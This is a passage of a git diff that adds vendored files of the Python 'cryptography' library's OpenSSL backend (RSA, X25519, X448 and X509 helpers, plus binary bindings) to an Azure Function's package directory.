typing.Union[RSAPrivateKey, RSAPublicKey], + hash_algorithm: hashes.HashAlgorithm, +) -> int: + salt = pss._salt_length + + if isinstance(salt, _MaxLength): + return calculate_max_pss_salt_length(key, hash_algorithm) + elif isinstance(salt, _DigestLength): + return hash_algorithm.digest_size + elif isinstance(salt, _Auto): + if isinstance(key, RSAPrivateKey): + raise ValueError( + "PSS salt length can only be set to AUTO when verifying" + ) + return backend._lib.RSA_PSS_SALTLEN_AUTO + else: + return salt + + +def _enc_dec_rsa( + backend: "Backend", + key: typing.Union["_RSAPrivateKey", "_RSAPublicKey"], + data: bytes, + padding: AsymmetricPadding, +) -> bytes: + if not isinstance(padding, AsymmetricPadding): + raise TypeError("Padding must be an instance of AsymmetricPadding.") + + if isinstance(padding, PKCS1v15): + padding_enum = backend._lib.RSA_PKCS1_PADDING + elif isinstance(padding, OAEP): + padding_enum = backend._lib.RSA_PKCS1_OAEP_PADDING + + if not isinstance(padding._mgf, MGF1): + raise UnsupportedAlgorithm( + "Only MGF1 is supported by this backend.", + _Reasons.UNSUPPORTED_MGF, + ) + + if not backend.rsa_padding_supported(padding): + raise UnsupportedAlgorithm( + "This combination of padding and hash algorithm is not " + "supported by this backend.", + _Reasons.UNSUPPORTED_PADDING, + ) + + else: + raise UnsupportedAlgorithm( + "{} is not supported by this backend.".format(padding.name), + _Reasons.UNSUPPORTED_PADDING, + ) + + return _enc_dec_rsa_pkey_ctx(backend, key, data, padding_enum, padding) + + +def _enc_dec_rsa_pkey_ctx( + backend: "Backend", + key: typing.Union["_RSAPrivateKey", "_RSAPublicKey"], + data: bytes, + padding_enum: int, + padding: AsymmetricPadding, +) -> bytes: + init: typing.Callable[[typing.Any], int] + crypt: typing.Callable[[typing.Any, typing.Any, int, bytes, int], int] + if isinstance(key, _RSAPublicKey): + init = backend._lib.EVP_PKEY_encrypt_init + crypt = backend._lib.EVP_PKEY_encrypt + else: + init = backend._lib.EVP_PKEY_decrypt_init + crypt = backend._lib.EVP_PKEY_decrypt + + pkey_ctx = backend._lib.EVP_PKEY_CTX_new(key._evp_pkey, backend._ffi.NULL) + backend.openssl_assert(pkey_ctx != backend._ffi.NULL) + pkey_ctx = backend._ffi.gc(pkey_ctx, backend._lib.EVP_PKEY_CTX_free) + res = init(pkey_ctx) + backend.openssl_assert(res == 1) + res = backend._lib.EVP_PKEY_CTX_set_rsa_padding(pkey_ctx, padding_enum) + backend.openssl_assert(res > 0) + buf_size = backend._lib.EVP_PKEY_size(key._evp_pkey) + backend.openssl_assert(buf_size > 0) + if isinstance(padding, OAEP): + mgf1_md = backend._evp_md_non_null_from_algorithm( + padding._mgf._algorithm + ) + res = backend._lib.EVP_PKEY_CTX_set_rsa_mgf1_md(pkey_ctx, mgf1_md) + backend.openssl_assert(res > 0) + oaep_md = backend._evp_md_non_null_from_algorithm(padding._algorithm) + res = backend._lib.EVP_PKEY_CTX_set_rsa_oaep_md(pkey_ctx, oaep_md) + backend.openssl_assert(res > 0) + + if ( + isinstance(padding, OAEP) + and padding._label is not None + and len(padding._label) > 0 + ): + # set0_rsa_oaep_label takes ownership of the char * so we need to + # copy it into some new memory + labelptr = backend._lib.OPENSSL_malloc(len(padding._label)) + backend.openssl_assert(labelptr != backend._ffi.NULL) + backend._ffi.memmove(labelptr, padding._label, len(padding._label)) + res = backend._lib.EVP_PKEY_CTX_set0_rsa_oaep_label( + pkey_ctx, labelptr, len(padding._label) + ) + backend.openssl_assert(res == 1) + + outlen = backend._ffi.new("size_t *", buf_size) + buf = backend._ffi.new("unsigned char[]", buf_size) + # Everything from this line onwards is written with the goal of being as + # constant-time as is practical given the constraints of Python and our + # API. See Bleichenbacher's '98 attack on RSA, and its many many variants. + # As such, you should not attempt to change this (particularly to "clean it + # up") without understanding why it was written this way (see + # Chesterton's Fence), and without measuring to verify you have not + # introduced observable time differences. + res = crypt(pkey_ctx, buf, outlen, data, len(data)) + resbuf = backend._ffi.buffer(buf)[: outlen[0]] + backend._lib.ERR_clear_error() + if res <= 0: + raise ValueError("Encryption/decryption failed.") + return resbuf + + +def _rsa_sig_determine_padding( + backend: "Backend", + key: typing.Union["_RSAPrivateKey", "_RSAPublicKey"], + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], +) -> int: + if not isinstance(padding, AsymmetricPadding): + raise TypeError("Expected provider of AsymmetricPadding.") + + pkey_size = backend._lib.EVP_PKEY_size(key._evp_pkey) + backend.openssl_assert(pkey_size > 0) + + if isinstance(padding, PKCS1v15): + # Hash algorithm is ignored for PKCS1v15-padding, may be None. + padding_enum = backend._lib.RSA_PKCS1_PADDING + elif isinstance(padding, PSS): + if not isinstance(padding._mgf, MGF1): + raise UnsupportedAlgorithm( + "Only MGF1 is supported by this backend.", + _Reasons.UNSUPPORTED_MGF, + ) + + # PSS padding requires a hash algorithm + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + + # Size of key in bytes - 2 is the maximum + # PSS signature length (salt length is checked later) + if pkey_size - algorithm.digest_size - 2 < 0: + raise ValueError( + "Digest too large for key size. Use a larger " + "key or different digest." + ) + + padding_enum = backend._lib.RSA_PKCS1_PSS_PADDING + else: + raise UnsupportedAlgorithm( + "{} is not supported by this backend.".format(padding.name), + _Reasons.UNSUPPORTED_PADDING, + ) + + return padding_enum + + +# Hash algorithm can be absent (None) to initialize the context without setting +# any message digest algorithm. This is currently only valid for the PKCS1v15 +# padding type, where it means that the signature data is encoded/decoded +# as provided, without being wrapped in a DigestInfo structure. +def _rsa_sig_setup( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + key: typing.Union["_RSAPublicKey", "_RSAPrivateKey"], + init_func: typing.Callable[[typing.Any], int], +): + padding_enum = _rsa_sig_determine_padding(backend, key, padding, algorithm) + pkey_ctx = backend._lib.EVP_PKEY_CTX_new(key._evp_pkey, backend._ffi.NULL) + backend.openssl_assert(pkey_ctx != backend._ffi.NULL) + pkey_ctx = backend._ffi.gc(pkey_ctx, backend._lib.EVP_PKEY_CTX_free) + res = init_func(pkey_ctx) + if res != 1: + errors = backend._consume_errors() + raise ValueError("Unable to sign/verify with this key", errors) + + if algorithm is not None: + evp_md = backend._evp_md_non_null_from_algorithm(algorithm) + res = backend._lib.EVP_PKEY_CTX_set_signature_md(pkey_ctx, evp_md) + if res <= 0: + backend._consume_errors() + raise UnsupportedAlgorithm( + "{} is not supported by this backend for RSA signing.".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + res = backend._lib.EVP_PKEY_CTX_set_rsa_padding(pkey_ctx, padding_enum) + if res <= 0: + backend._consume_errors() + raise UnsupportedAlgorithm( + "{} is not supported for the RSA signature operation.".format( + padding.name + ), + _Reasons.UNSUPPORTED_PADDING, + ) + if isinstance(padding, PSS): + assert isinstance(algorithm, hashes.HashAlgorithm) + res = backend._lib.EVP_PKEY_CTX_set_rsa_pss_saltlen( + pkey_ctx, + _get_rsa_pss_salt_length(backend, padding, key, algorithm), + ) + backend.openssl_assert(res > 0) + + mgf1_md = backend._evp_md_non_null_from_algorithm( + padding._mgf._algorithm + ) + res = backend._lib.EVP_PKEY_CTX_set_rsa_mgf1_md(pkey_ctx, mgf1_md) + backend.openssl_assert(res > 0) + + return pkey_ctx + + +def _rsa_sig_sign( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: hashes.HashAlgorithm, + private_key: "_RSAPrivateKey", + data: bytes, +) -> bytes: + pkey_ctx = _rsa_sig_setup( + backend, + padding, + algorithm, + private_key, + backend._lib.EVP_PKEY_sign_init, + ) + buflen = backend._ffi.new("size_t *") + res = backend._lib.EVP_PKEY_sign( + pkey_ctx, backend._ffi.NULL, buflen, data, len(data) + ) + backend.openssl_assert(res == 1) + buf = backend._ffi.new("unsigned char[]", buflen[0]) + res = backend._lib.EVP_PKEY_sign(pkey_ctx, buf, buflen, data, len(data)) + if res != 1: + errors = backend._consume_errors_with_text() + raise ValueError( + "Digest or salt length too long for key size. Use a larger key " + "or shorter salt length if you are specifying a PSS salt", + errors, + ) + + return backend._ffi.buffer(buf)[:] + + +def _rsa_sig_verify( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: hashes.HashAlgorithm, + public_key: "_RSAPublicKey", + signature: bytes, + data: bytes, +) -> None: + pkey_ctx = _rsa_sig_setup( + backend, + padding, + algorithm, + public_key, + backend._lib.EVP_PKEY_verify_init, + ) + res = backend._lib.EVP_PKEY_verify( + pkey_ctx, signature, len(signature), data, len(data) + ) + # The previous call can return negative numbers in the event of an + # error. This is not a signature failure but we need to fail if it + # occurs. + backend.openssl_assert(res >= 0) + if res == 0: + backend._consume_errors() + raise InvalidSignature + + +def _rsa_sig_recover( + backend: "Backend", + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + public_key: "_RSAPublicKey", + signature: bytes, +) -> bytes: + pkey_ctx = _rsa_sig_setup( + backend, + padding, + algorithm, + public_key, + backend._lib.EVP_PKEY_verify_recover_init, + ) + + # Attempt to keep the rest of the code in this function as constant/time + # as possible. See the comment in _enc_dec_rsa_pkey_ctx. Note that the + # buflen parameter is used even though its value may be undefined in the + # error case. Due to the tolerant nature of Python slicing this does not + # trigger any exceptions. + maxlen = backend._lib.EVP_PKEY_size(public_key._evp_pkey) + backend.openssl_assert(maxlen > 0) + buf = backend._ffi.new("unsigned char[]", maxlen) + buflen = backend._ffi.new("size_t *", maxlen) + res = backend._lib.EVP_PKEY_verify_recover( + pkey_ctx, buf, buflen, signature, len(signature) + ) + resbuf = backend._ffi.buffer(buf)[: buflen[0]] + backend._lib.ERR_clear_error() + # Assume that all parameter errors are handled during the setup phase and + # any error here is due to invalid signature. + if res != 1: + raise InvalidSignature + return resbuf + + +class _RSAPrivateKey(RSAPrivateKey): + _evp_pkey: object + _rsa_cdata: object + _key_size: int + + def __init__( + self, backend: "Backend", rsa_cdata, evp_pkey, _skip_check_key: bool + ): + res: int + # RSA_check_key is slower in OpenSSL 3.0.0 due to improved + # primality checking. In normal use this is unlikely to be a problem + # since users don't load new keys constantly, but for TESTING we've + # added an init arg that allows skipping the checks. You should not + # use this in production code unless you understand the consequences. + if not _skip_check_key: + res = backend._lib.RSA_check_key(rsa_cdata) + if res != 1: + errors = backend._consume_errors_with_text() + raise ValueError("Invalid private key", errors) + # 2 is prime and passes an RSA key check, so we also check + # if p and q are odd just to be safe. + p = backend._ffi.new("BIGNUM **") + q = backend._ffi.new("BIGNUM **") + backend._lib.RSA_get0_factors(rsa_cdata, p, q) + backend.openssl_assert(p[0] != backend._ffi.NULL) + backend.openssl_assert(q[0] != backend._ffi.NULL) + p_odd = backend._lib.BN_is_odd(p[0]) + q_odd = backend._lib.BN_is_odd(q[0]) + if p_odd != 1 or q_odd != 1: + errors = backend._consume_errors_with_text() + raise ValueError("Invalid private key", errors) + + # Blinding is on by default in many versions of OpenSSL, but let's + # just be conservative here. + res = backend._lib.RSA_blinding_on(rsa_cdata, backend._ffi.NULL) + backend.openssl_assert(res == 1) + + self._backend = backend + self._rsa_cdata = rsa_cdata + self._evp_pkey = evp_pkey + + n = self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key( + self._rsa_cdata, + n, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(n[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def decrypt(self, ciphertext: bytes, padding: AsymmetricPadding) -> bytes: + key_size_bytes = (self.key_size + 7) // 8 + if key_size_bytes != len(ciphertext): + raise ValueError("Ciphertext length must be equal to key size.") + + return _enc_dec_rsa(self._backend, self, ciphertext, padding) + + def public_key(self) -> RSAPublicKey: + ctx = self._backend._lib.RSAPublicKey_dup(self._rsa_cdata) + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.RSA_free) + evp_pkey = self._backend._rsa_cdata_to_evp_pkey(ctx) + return _RSAPublicKey(self._backend, ctx, evp_pkey) + + def private_numbers(self) -> RSAPrivateNumbers: + n = self._backend._ffi.new("BIGNUM **") + e = self._backend._ffi.new("BIGNUM **") + d = self._backend._ffi.new("BIGNUM **") + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + dmp1 = self._backend._ffi.new("BIGNUM **") + dmq1 = self._backend._ffi.new("BIGNUM **") + iqmp = self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key(self._rsa_cdata, n, e, d) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(e[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(d[0] != self._backend._ffi.NULL) + self._backend._lib.RSA_get0_factors(self._rsa_cdata, p, q) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend._lib.RSA_get0_crt_params( + self._rsa_cdata, dmp1, dmq1, iqmp + ) + self._backend.openssl_assert(dmp1[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(dmq1[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(iqmp[0] != self._backend._ffi.NULL) + return RSAPrivateNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + d=self._backend._bn_to_int(d[0]), + dmp1=self._backend._bn_to_int(dmp1[0]), + dmq1=self._backend._bn_to_int(dmq1[0]), + iqmp=self._backend._bn_to_int(iqmp[0]), + public_numbers=RSAPublicNumbers( + e=self._backend._bn_to_int(e[0]), + n=self._backend._bn_to_int(n[0]), + ), + ) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._rsa_cdata, + ) + + def sign( + self, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> bytes: + data, algorithm = _calculate_digest_and_algorithm(data, algorithm) + return _rsa_sig_sign(self._backend, padding, algorithm, self, data) + + +class _RSAPublicKey(RSAPublicKey): + _evp_pkey: object + _rsa_cdata: object + _key_size: int + + def __init__(self, backend: "Backend", rsa_cdata, evp_pkey): + self._backend = backend + self._rsa_cdata = rsa_cdata + self._evp_pkey = evp_pkey + + n = self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key( + self._rsa_cdata, + n, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(n[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def encrypt(self, plaintext: bytes, padding: AsymmetricPadding) -> bytes: + return _enc_dec_rsa(self._backend, self, plaintext, padding) + + def public_numbers(self) -> RSAPublicNumbers: + n = self._backend._ffi.new("BIGNUM **") + e = self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key( + self._rsa_cdata, n, e, self._backend._ffi.NULL + ) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(e[0] != self._backend._ffi.NULL) + return RSAPublicNumbers( + e=self._backend._bn_to_int(e[0]), + n=self._backend._bn_to_int(n[0]), + ) + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, self._rsa_cdata + ) + + def verify( + self, + signature: bytes, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + data, algorithm = _calculate_digest_and_algorithm(data, algorithm) + _rsa_sig_verify( + self._backend, padding, algorithm, self, signature, data + ) + + def recover_data_from_signature( + self, + signature: bytes, + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + ) -> bytes: + if isinstance(algorithm, asym_utils.Prehashed): + raise TypeError( + "Prehashed is only supported in the sign and verify methods. " + "It cannot be used with recover_data_from_signature." + ) + return _rsa_sig_recover( + self._backend, padding, algorithm, self, signature + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/utils.py new file mode 100644 index 0000000..1b674a8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/utils.py @@ -0,0 +1,52 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives.asymmetric.utils import Prehashed + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _evp_pkey_derive(backend: "Backend", evp_pkey, peer_public_key) -> bytes: + ctx = backend._lib.EVP_PKEY_CTX_new(evp_pkey, backend._ffi.NULL) + backend.openssl_assert(ctx != backend._ffi.NULL) + ctx = backend._ffi.gc(ctx, backend._lib.EVP_PKEY_CTX_free) + res = backend._lib.EVP_PKEY_derive_init(ctx) + backend.openssl_assert(res == 1) + res = backend._lib.EVP_PKEY_derive_set_peer(ctx, peer_public_key._evp_pkey) + backend.openssl_assert(res == 1) + keylen = backend._ffi.new("size_t *") + res = backend._lib.EVP_PKEY_derive(ctx, backend._ffi.NULL, keylen) + backend.openssl_assert(res == 1) + backend.openssl_assert(keylen[0] > 0) + buf = backend._ffi.new("unsigned char[]", keylen[0]) + res = backend._lib.EVP_PKEY_derive(ctx, buf, keylen) + if res != 1: + errors_with_text = backend._consume_errors_with_text() + raise ValueError("Error computing shared key.", errors_with_text) + + return backend._ffi.buffer(buf, keylen[0])[:] + + +def _calculate_digest_and_algorithm( + data: bytes, + algorithm: typing.Union[Prehashed, hashes.HashAlgorithm], +) -> typing.Tuple[bytes, hashes.HashAlgorithm]: + if not isinstance(algorithm, Prehashed): + hash_ctx = hashes.Hash(algorithm) + hash_ctx.update(data) + data = hash_ctx.finalize() + else: + algorithm = algorithm._algorithm + + if len(data) != algorithm.digest_size: + raise ValueError( + "The provided data must be the same length as the hash " + "algorithm's digest size." + ) + + return (data, algorithm) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x25519.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x25519.py new file mode 100644 index 0000000..74db705 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x25519.py @@ -0,0 +1,132 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.x25519 import ( + X25519PrivateKey, + X25519PublicKey, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +_X25519_KEY_SIZE = 32 + + +class _X25519PublicKey(X25519PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + ucharpp = self._backend._ffi.new("unsigned char **") + res = self._backend._lib.EVP_PKEY_get1_tls_encodedpoint( + self._evp_pkey, ucharpp + ) + self._backend.openssl_assert(res == 32) + self._backend.openssl_assert(ucharpp[0] != self._backend._ffi.NULL) + data = self._backend._ffi.gc( + ucharpp[0], self._backend._lib.OPENSSL_free + ) + return self._backend._ffi.buffer(data, res)[:] + + +class _X25519PrivateKey(X25519PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_key(self) -> X25519PublicKey: + bio = self._backend._create_mem_bio_gc() + res = self._backend._lib.i2d_PUBKEY_bio(bio, self._evp_pkey) + self._backend.openssl_assert(res == 1) + evp_pkey = self._backend._lib.d2i_PUBKEY_bio( + bio, self._backend._ffi.NULL + ) + self._backend.openssl_assert(evp_pkey != self._backend._ffi.NULL) + evp_pkey = self._backend._ffi.gc( + evp_pkey, self._backend._lib.EVP_PKEY_free + ) + return _X25519PublicKey(self._backend, evp_pkey) + + def exchange(self, peer_public_key: X25519PublicKey) -> bytes: + if not isinstance(peer_public_key, X25519PublicKey): + raise TypeError("peer_public_key must be X25519PublicKey.") + + return _evp_pkey_derive(self._backend, self._evp_pkey, peer_public_key) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + # When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can + # switch this to EVP_PKEY_new_raw_private_key + # The trick we use here is serializing to a PKCS8 key and just + # using the last 32 bytes, which is the key itself. + bio = self._backend._create_mem_bio_gc() + res = self._backend._lib.i2d_PKCS8PrivateKey_bio( + bio, + self._evp_pkey, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + 0, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(res == 1) + pkcs8 = self._backend._read_mem_bio(bio) + self._backend.openssl_assert(len(pkcs8) == 48) + return pkcs8[-_X25519_KEY_SIZE:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x448.py new file mode 100644 index 0000000..9c3aea1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x448.py @@ -0,0 +1,117 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.x448 import ( + X448PrivateKey, + X448PublicKey, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + +_X448_KEY_SIZE = 56 + + +class _X448PublicKey(X448PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _X448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _X448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _X448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _X448_KEY_SIZE)[:] + + +class _X448PrivateKey(X448PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_key(self) -> X448PublicKey: + buf = self._backend._ffi.new("unsigned char []", _X448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _X448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _X448_KEY_SIZE) + public_bytes = self._backend._ffi.buffer(buf)[:] + return self._backend.x448_load_public_bytes(public_bytes) + + def exchange(self, peer_public_key: X448PublicKey) -> bytes: + if not isinstance(peer_public_key, X448PublicKey): + raise TypeError("peer_public_key must be X448PublicKey.") + + return _evp_pkey_derive(self._backend, self._evp_pkey, peer_public_key) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _X448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _X448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_private_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _X448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _X448_KEY_SIZE)[:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x509.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x509.py new file mode 100644 index 0000000..92b6d0e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x509.py @@ -0,0 +1,45 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import warnings + +from cryptography import utils, x509 + + +# This exists for pyOpenSSL compatibility and SHOULD NOT BE USED +# WE WILL REMOVE THIS VERY SOON. +def _Certificate(backend, x509) -> x509.Certificate: # noqa: N802 + warnings.warn( + "This version of cryptography contains a temporary pyOpenSSL " + "fallback path. Upgrade pyOpenSSL now.", + utils.DeprecatedIn35, + ) + return backend._ossl2cert(x509) + + +# This exists for pyOpenSSL compatibility and SHOULD NOT BE USED +# WE WILL REMOVE THIS VERY SOON. +def _CertificateSigningRequest( # noqa: N802 + backend, x509_req +) -> x509.CertificateSigningRequest: + warnings.warn( + "This version of cryptography contains a temporary pyOpenSSL " + "fallback path. Upgrade pyOpenSSL now.", + utils.DeprecatedIn35, + ) + return backend._ossl2csr(x509_req) + + +# This exists for pyOpenSSL compatibility and SHOULD NOT BE USED +# WE WILL REMOVE THIS VERY SOON. +def _CertificateRevocationList( # noqa: N802 + backend, x509_crl +) -> x509.CertificateRevocationList: + warnings.warn( + "This version of cryptography contains a temporary pyOpenSSL " + "fallback path. Upgrade pyOpenSSL now.", + utils.DeprecatedIn35, + ) + return backend._ossl2crl(x509_crl) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..0db6883 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so new file mode 100644 index 0000000..a658b50 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust.abi3.so b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust.abi3.so new file mode 100644 index 0000000..6c23c80 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust.abi3.so differ diff --git 